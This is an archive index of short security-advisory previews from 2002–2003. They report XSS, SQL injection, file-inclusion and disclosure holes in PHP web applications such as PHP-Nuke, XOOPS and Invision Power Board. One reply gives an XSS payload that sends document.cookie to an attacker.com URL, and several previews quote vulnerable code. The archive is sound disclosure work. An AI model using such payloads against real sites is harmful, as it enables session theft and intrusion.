BBCode XSS in XOOPS CMS

2003-08-14 Thread Frog Man
Informations : ° Language : PHP Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked) Safe Version : 2.0.3 Website : http://www.xoops.org Problem : BBcode XSS PHP Code/Location : °°° This hole can be used in modules : - Private Messages - News - NewBB

pMachine (PHP) : Include() Security Hole

2003-06-23 Thread Frog Man
Informations : ° Language : PHP Version : Free 2.2.1 Website : http://www.pmachine.com Problem : Include() Security Hole PHP Code/Location : °°° This will work if register_globals is ON *OR* OFF. /pm/lib.inc.php :

Re: PHP-Nuke block-Forums.php subject vulnerabilities

2003-04-02 Thread Frog Man
I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or , like this : lt;name=alt;input type=hidden name=u value=http://www.attacker.com/prova.phplt;/form lt;scriptwindow.open(document.a.u.value+document.cookie)lt;/script What do

PHP-Nuke 6.0 6.5RC2 SQL Injection Again

2003-03-11 Thread Frog Man
Informations : °° Language : PHP Website : http://www.phpnuke.org Version : 6.0 6.5 RC2 Modules : Forums, Private_Messages Problem : SQL Injection PHP Code/Location : °°° /modules/Forums/viewtopic.php :

PHP-Nuke 6.0 ( 6.5?) : Serious SQL Injection Security Holes

2003-03-06 Thread Frog Man
Informations : °° Language : PHP Website : http://www.phpnuke.org Versions : 6.0 ( 6.5?) Modules : Members_List, Your_Account Problem : SQL Injection PHP Configuration : This will work if magic_quotes_gpc=OFF. PHP Code/Location : °°° /modules/Members_List/index.php :

GTcatalog (PHP)

2003-03-03 Thread Frog Man
Informations : °° Version : 0.9 Website : http://www.geektweaked.com Problem : - Informations Disclosure (Admin Password) - File Including PHP Code/Location : °°° password.inc : ? $globalpw = [PASSWORD]; ? index.php :

Invision Power Board (PHP)

2003-02-27 Thread Frog Man
Informations : °° Website : http://www.invisionboard.com -- Version : 1.0.1 Problem : phpinfo() -- Version : 1.1.1 Problem : File Including PHP Code/Location : °°° v1.0.1 : phpinfo.php : -- ?php phpinfo(); ?

Myguestbook (PHP)

2003-02-21 Thread Frog Man
Informations : °° Version : 3.0 Website : http://www.tefonline.net/ Problems : - XSS - admin infos recovery - Access to admin pages PHP Code/Location : °°° If pseudo = [SCRIPT], e-mail = [SCRIPT] or message = /textarea[SCRIPT] [SCRIPT] will be executed on index.php,

php-Board (php)

2003-02-18 Thread Frog Man
Informations : °° Website : http://www.hp-planet.de Version : 1 Problem : Informations disclosure PHP Code/Location : °°° login.php : - function passwd2($user) { $password=nicht registriert; if (file_exists(user/.$user..txt))

DotBr (PHP)

2003-02-18 Thread Frog Man
Informations : °° Website : http://dotbr.org Version : 0.1 Problems : - phpinfo() - Informations disclosure - System commands execution PHP Code/Location : °°° foo.php3 : - ? phpinfo(); ? - config.inc : - SQL password - SQL

D-Forum (PHP)

2003-02-18 Thread Frog Man
Informations : °° Website : http://www.adalis.fr/adalis.html Versions : 1.00 - 1.11 Problem : Include file PHP Code/Location : °°° /includes/header.php3 : --- ?php if ($my_header!=) { include ($my_header); } else { ? ...

phpMyShop (php)

2003-02-03 Thread Frog Man
Informations : °° Version : 1.00 Website : http://www.pc-encheres.com Problem : SQL Injection PHP Code/Location : °°° compte.php : --- ? session_start(); if (isset($achat)) { session_register(achat); }

myphpPagetool (php)

2003-02-03 Thread Frog Man
Informations : °° Version : 0.4.3-1 Website : http://myphppagetool.sourceforge.net/ Problem : Include file PHP Code/Location : °°° In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and

Re: dotproject Remote Code Execution Vulnerability : Patch

2003-01-29 Thread Frog Man
A non-official patch has been created for this hole and is published on http://www.phpsecure.org/index.php?zone=pPatchAsAlpha=dl=us (english version) . From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: dotproject Remote Code Execution Vulnerability Date: Wed, 29 Jan 2003 04:02:24 -0800

Re: Zorum Portal (PHP)

2003-01-27 Thread Frog Man
A patch has been created for this hole and can be found on http://www.phpsecure.org/. From: MGhz [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Zorum Portal (PHP) Date: 22 Jan 2003 19:45:26 - Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file

MyRoom (PHP)

2003-01-22 Thread Frog Man
Informations : °° Website : http://www.plansbiz.net Version : 3.5 GOLD Problems : File copy/upload PHP Code/Location : °°° room/save_item.php : if($name == OR $ref == ){ echo You are fogot enter

phpPass (PHP)

2003-01-20 Thread Frog Man
Informations : °° Version : 2 Website : http://www.agames-net.com Problem : SQL Injection PHP Code/Location : °°° accesscontrol.php : [...] session_register(uid); session_register(pwd); [...] $sql = SELECT * FROM user

vSignup, vAuthenticate (PHP)

2003-01-20 Thread Frog Man
Informations : °° --- Product : vAuthenticate Version : 2.8 --- Product : vSignup Version : 2.1 --- Website : http://www.beanbug.net Problem : SQL Injection PHP Code/Location : °°° chgpwd.php :

E-theni (PHP)

2003-01-15 Thread Frog Man
Informations : °° Version : ? Website : http://www.theni.freesurf.fr Problems : - Include file - phpinfo() PHP Code/Location : °°° /admin_t/include/aff_liste_langue.php : - require ($rep_include.para_langue.php);

OpenTopic security hole

2003-01-04 Thread Frog Man
Informations : °° Product : OpenTopic Website : http://www.infopop.com Version : 2.3.1 Problem : XSS (script injection) - Cookies recovery Location/Exploit : °° The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ). XSS to get cookie :

N/X (PHP)

2003-01-02 Thread Frog Man
Informations : °° Website : http://nxwcms.sourceforge.net/ Version : 2002 PreRelease 1 Problem : Include file PHP Code/Location : °°° nx/common/cds/menu.inc.php : --- [...] require_once

PEEL (PHP)

2002-12-31 Thread Frog Man
Informations : °° Version : 1.0b Website : http://www.mapetite-entreprise.com Problem : Include file PHP Code/Location : °°° modeles/haut.php : --- ? $langfile = $dirroot./lang/.$SESSION[lang]./lang.php; require

SPGpartenaires (PHP)

2002-12-20 Thread Frog Man
Informations : °° Version : ? - 3.0.1 Website : http://www.scripts-php-gratuits.com Problem : SQL Injection - Access to member's accounts PHP Code/Location : °°° modif/ident.php : -- [...] $sql=SELECT nomsite FROM

WAnewsletter (PHP)

2002-12-19 Thread Frog Man
Informations : °° Website : http://www.phpcodeur.net Versions : 2.0beta - 2.1.0 Problem : Include file PHP Code/Location : °°° newsletter.php 2.1beta - 2.1.0 : if( !empty($HTTP_POST_VARS['action']) ) { $action =

PHP-Nuke 6.0 : Path Disclosure Cross Site Scripting

2002-12-16 Thread Frog Man
Informations : °° Product : PHP-Nuke Version : 6.0 Website : http://www.phpnuke.org Problems : - Path Disclosure - XSS Development : °°° The majority of PHPNuke's files are included in modules.php or index.php. To prevent the direct access, PHPNuke made two kinds

Security Patchs for PHP Products

2002-12-16 Thread Frog Man
PHPSecure made some patches for security holes in PHP products. Here is the list : - ALP - Banner Ad 2.0 : http://www.phpsecure.org/index.php?id=1zone=pDl More details : http://online.securityfocus.com/search?category=22query=ALP - Tight Auction 3.0 :

MyPHPLinks (PHP) : SQL Injection

2002-12-14 Thread Frog Man
Informations : °° Website : http://www.myphpsoft.net Version : ? - 2.1.9, 2.2.0CVS Problem : SQL Injection - Admin access PHP Code/Location : °°° admin/auth/checksession.php --- [...] if($idsession!=''){ $dbs

Re: XSS and Path Disclosure in UPB

2002-12-10 Thread Frog Man
Everything about UPB was already written (1.1 1.0beta) : http://www.frogsecure.com/tutos/UPB.txt From: euronymous [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: XSS and Path Disclosure in UPB Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)

Thatware (PHP)

2002-12-02 Thread Frog Man
Informations : °° Versions : ? - 0.3 - 0.5.3 Website : http://www.thatware.org Problems : - Include file - SQL Injection PHP Code/Location : °°° artlist.php (v0.5.2, 0.5.3) : - include $root_path.'thatfile.php';

FreeNews News Evolution (PHP)

2002-11-27 Thread Frog Man
Informations : °° Problem : Include files a) --- Product : Freenews Version : 2.1 Website : http://www.prologin.fr -- b) --- Product : News Evolution Versions : 1.0, 2.0 Website : http://www.phpevolution.net --

Immobilier 1 (PHP)

2002-11-26 Thread Frog Man
Informations : °° Version, Website : ? Problems : - phpinfo() - SQL Injection PHP Code/Location : °°° agentadmin.php : -- [...] } elseif ($agentname != OR $current_user != ) { $sql = SELECT id FROM

Web Server Creator - Web Portal 0.1 (PHP)

2002-11-25 Thread Frog Man
Informations : °° Website : http://webcreator.com02.com Tested version : 0.1 Problem : Include file PHP Code/Location : °°° news/include/customize.php : -- ? $langfile = $l; include $l; ? -- index.php :

dobermann FORUM (php)

2002-10-28 Thread Frog Man
Informations : °° Product : dobermann FORUM version : 0.5 website : http://www.le-dobermann.com Problem : Include file PHP Code/location : °°° entete.php enteteacceuil.php topic/entete.php : -- ?php include $subpath.banniere.php;

gBook

2002-10-22 Thread Frog Man
Informations : °° Language : PHP Tested version : 1.4 Problem : Admin access PHP Code : °° /gb/index.php : -- ?php include(config.inc.php); if($action == login) { if($user == $loginu $pw == $loginpw) { setcookie(login,

phpnewsDev

2002-10-22 Thread Frog Man
Informations : °° Language : PHP Tested version : 1 Problem : bad use of include() PHP Code : °° ---Include/variables.php3--- ? $Mac=localhost; $Uti=root; $Mot=; $Bd=phpnews; $AnneeDeDemarrage=2000; $MoisDeDemarrage=8; $NbNouvelles=5; require($Include/french.inc); ?

SSGbook (ASP)

2002-10-08 Thread Frog Man
Informations : °° Product : SSGbook Language : ASP Tested version : 1 Website : http://www.script-shed.com Problem : Cross Site Scripting PHP Code / location : ° - config.asp -- fString = doCode(fString, [img],[/img],img src=,

phpSecurePages Killer Protection ( PHP )

2002-10-07 Thread Frog Man
1) Informations : °° Product : phpSecurePages Tested version : 0.27b Website : http://www.phpsecurepages.f2s.com Problem : include file PHP Code : °° -- checklogin.php - if (!$login) { // no login available include($cfgProgDir .

phpMyNewsletter

2002-10-03 Thread Frog Man
Informations : °° Product : phpMyNewsletter Tested version : 0.6.10 Website : http://gregory.kokanosky.free.fr/phpmynewsletter/ Problem : include file PHP code : °° /include/customize.php ? $langfile = $l; include $l; ? /include/customize.php Exploit :

Multiple Web Security Holes

2002-10-02 Thread Frog Man
I sent this three times to webappsec but without results. So I am trying on bugtraq, although that is less appropriate. - Five products in PHP are vulnerable to various holes. 1) TightAuction Website : http://www.tightprices.com Tested Version :

MySimpleNews (PHP)

2002-10-02 Thread Frog Man
Informations : °° Language : PHP Tested version : 1 Website : ? Comment : Very simple code. a) Writing PHP code in a PHP file and execution of this code. Problem : ° - users.php - ? $fp=fopen(news.php3,a); fwrite($fp,Posté Par [$LOGIN]\n);